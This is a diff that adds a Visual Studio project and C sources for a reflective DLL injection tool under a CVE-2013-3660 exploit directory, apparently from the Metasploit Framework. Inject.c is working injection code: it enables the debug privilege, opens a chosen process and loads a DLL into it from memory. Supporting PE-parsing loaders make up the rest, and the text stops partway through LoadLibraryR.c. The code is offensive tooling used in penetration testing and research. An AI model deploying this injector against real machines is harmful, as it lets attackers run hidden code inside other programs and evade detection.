+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Console</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Console</SubSystem>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Console</SubSystem>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;WIN_X86;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Console</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+    <PostBuildEvent>
+      <Command>copy ..\Release\inject.exe ..\bin\</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;WIN_ARM;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Console</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OutputFile>$(OutDir)inject.arm.exe</OutputFile>
+      <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+    <PostBuildEvent>
+      <Command>copy ..\ARM\Release\inject.arm.exe ..\bin\</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN64;NDEBUG;_CONSOLE;_WIN64;WIN_X64;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <OutputFile>$(OutDir)inject.x64.exe</OutputFile>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Console</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+    <PostBuildEvent>
+      <Command>copy ..\x64\Release\inject.x64.exe ..\bin\</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="src\GetProcAddressR.c" />
+    <ClCompile Include="src\Inject.c" />
+    <ClCompile Include="src\LoadLibraryR.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="src\GetProcAddressR.h" />
+    <ClInclude Include="src\LoadLibraryR.h" />
+    <ClInclude Include="src\ReflectiveDLLInjection.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters b/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters
new file mode 100755
index 0000000000..418896d025
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="src\GetProcAddressR.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="src\Inject.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="src\LoadLibraryR.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="src\GetProcAddressR.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="src\LoadLibraryR.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="src\ReflectiveDLLInjection.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c b/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c
new file mode 100755
index 0000000000..ef96dcbfbe
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c
@@ -0,0 +1,116 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#include "GetProcAddressR.h"
+//===============================================================================================//
+// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
+// wont be able to resolve exported addresses in reflectivly loaded librarys.
+FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
+{
+	UINT_PTR uiLibraryAddress = 0;
+	FARPROC fpResult          = NULL;
+
+	if( hModule == NULL )
+		return NULL;
+
+	// a module handle is really its base address
+	uiLibraryAddress = (UINT_PTR)hModule;
+
+	__try
+	{
+		UINT_PTR uiAddressArray = 0;
+		UINT_PTR uiNameArray    = 0;
+		UINT_PTR uiNameOrdinals = 0;
+		PIMAGE_NT_HEADERS pNtHeaders             = NULL;
+		PIMAGE_DATA_DIRECTORY pDataDirectory     = NULL;
+		PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
+			
+		// get the VA of the modules NT Header
+		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
+
+		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
+
+		// get the VA of the export directory
+		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
+			
+		// get the VA for the array of addresses
+		uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
+
+		// get the VA for the array of name pointers
+		uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
+				
+		// get the VA for the array of name ordinals
+		uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
+
+		// test if we are importing by name or by ordinal...
+		if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
+		{
+			// import by ordinal...
+
+			// use the import ordinal (- export ordinal base) as an index into the array of addresses
+			uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
+
+			// resolve the address for this imported function
+			fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
+		}
+		else
+		{
+			// import by name...
+			DWORD dwCounter = pExportDirectory->NumberOfNames;
+			while( dwCounter-- )
+			{
+				char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
+				
+				// test if we have a match...
+				if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
+				{
+					// use the functions name ordinal as an index into the array of name pointers
+					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
+					
+					// calculate the virtual address for the function
+					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
+					
+					// finish...
+					break;
+				}
+						
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+	}
+	__except( EXCEPTION_EXECUTE_HANDLER )
+	{
+		fpResult = NULL;
+	}
+
+	return fpResult;
+}
+//===============================================================================================//
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h b/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h
new file mode 100755
index 0000000000..4f5170c31d
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h
@@ -0,0 +1,36 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
+#define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
+//===============================================================================================//
+#include "ReflectiveDLLInjection.h"
+
+FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
+//===============================================================================================//
+#endif
+//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/Inject.c b/external/source/exploits/cve-2013-3660/inject/src/Inject.c
new file mode 100755
index 0000000000..a7f4a2fee3
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/inject/src/Inject.c
@@ -0,0 +1,120 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include "LoadLibraryR.h"
+
+#pragma comment(lib,"Advapi32.lib")
+
+#define BREAK_WITH_ERROR( e ) { printf( "[-] %s. Error=%d", e, GetLastError() ); break; }
+
+// Simple app to inject a reflective DLL into a process vis its process ID.
+int main( int argc, char * argv[] )
+{
+	HANDLE hFile          = NULL;
+	HANDLE hModule        = NULL;
+	HANDLE hProcess       = NULL;
+	HANDLE hToken         = NULL;
+	LPVOID lpBuffer       = NULL;
+	DWORD dwLength        = 0;
+	DWORD dwBytesRead     = 0;
+	DWORD dwProcessId     = 0;
+	TOKEN_PRIVILEGES priv = {0};
+
+#ifdef WIN_X64
+	char * cpDllFile  = "reflective_dll.x64.dll";
+#else
+#ifdef WIN_X86
+	char * cpDllFile  = "reflective_dll.dll";
+#else WIN_ARM
+	char * cpDllFile  = "reflective_dll.arm.dll";
+#endif
+#endif
+
+	do
+	{
+		// Usage: inject.exe [pid] [dll_file]
+
+		if( argc == 1 )
+			dwProcessId = GetCurrentProcessId();
+		else
+			dwProcessId = atoi( argv[1] );
+
+		if( argc >= 3 )
+			cpDllFile = argv[2];
+
+		hFile = CreateFileA( cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
+		if( hFile == INVALID_HANDLE_VALUE )
+			BREAK_WITH_ERROR( "Failed to open the DLL file" );
+
+		dwLength = GetFileSize( hFile, NULL );
+		if( dwLength == INVALID_FILE_SIZE || dwLength == 0 )
+			BREAK_WITH_ERROR( "Failed to get the DLL file size" );
+
+		lpBuffer = HeapAlloc( GetProcessHeap(), 0, dwLength );
+		if( !lpBuffer )
+			BREAK_WITH_ERROR( "Failed to get the DLL file size" );
+
+		if( ReadFile( hFile, lpBuffer, dwLength, &dwBytesRead, NULL ) == FALSE )
+			BREAK_WITH_ERROR( "Failed to alloc a buffer!" );
+
+		if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
+		{
+			priv.PrivilegeCount           = 1;
+			priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+		
+			if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
+				AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL );
+
+			CloseHandle( hToken );
+		}
+
+		hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId );
+		if( !hProcess )
+			BREAK_WITH_ERROR( "Failed to open the target process" );
+
+		hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, NULL );
+		if( !hModule )
+			BREAK_WITH_ERROR( "Failed to inject the DLL" );
+
+		printf( "[+] Injected the '%s' DLL into process %d.", cpDllFile, dwProcessId );
+		
+		WaitForSingleObject( hModule, -1 );
+
+	} while( 0 );
+
+	if( lpBuffer )
+		HeapFree( GetProcessHeap(), 0, lpBuffer );
+
+	if( hProcess )
+		CloseHandle( hProcess );
+
+	return 0;
+}
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c b/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c
new file mode 100755
index 0000000000..db73903ff7
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c
@@ -0,0 +1,234 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#include "LoadLibraryR.h"
+#include <stdio.h>
+//===============================================================================================//
+DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
+{    
+	WORD wIndex                          = 0;
+	PIMAGE_SECTION_HEADER pSectionHeader = NULL;
+	PIMAGE_NT_HEADERS pNtHeaders         = NULL;
+	
+	pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
+
+	pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
+
+    if( dwRva < pSectionHeader[0].PointerToRawData )
+        return dwRva;
+
+    for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
+    {   
+        if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )           
+           return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
+    }
+    
+    return 0;
+}
+//===============================================================================================//
+DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
+{
+	UINT_PTR uiBaseAddress   = 0;
+	UINT_PTR uiExportDir     = 0;
+	UINT_PTR uiNameArray     = 0;
+	UINT_PTR uiAddressArray  = 0;
+	UINT_PTR uiNameOrdinals  = 0;
+	DWORD dwCounter          = 0;
+#ifdef WIN_X64
+	DWORD dwCompiledArch = 2;
+#else
+	// This will catch Win32 and WinRT.
+	DWORD dwCompiledArch = 1;
+#endif
+
+	uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
+
+	// get the File Offset of the modules NT Header
+	uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
+
+	// currenlty we can only process a PE file which is the same type as the one this fuction has  
+	// been compiled as, due to various offset in the PE structures being defined at compile time.
+	if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
+	{
+		if( dwCompiledArch != 1 )
+			return 0;
+	}
+	else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
+	{
+		if( dwCompiledArch != 2 )
+			return 0;
+	}
+	else
+	{
+		return 0;
+	}
+
+	// uiNameArray = the address of the modules export directory entry
+	uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
+
+	// get the File Offset of the export directory
+	uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
+
+	// get the File Offset for the array of name pointers
+	uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
+
+	// get the File Offset for the array of addresses
+	uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
+
+	// get the File Offset for the array of name ordinals
+	uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );	
+
+	// get a counter for the number of exported functions...
+	dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
+
+	// loop through all the exported functions to find the ReflectiveLoader
+	while( dwCounter-- )
+	{
+		char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
+
+		if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
+		{
+			// get the File Offset for the array of addresses
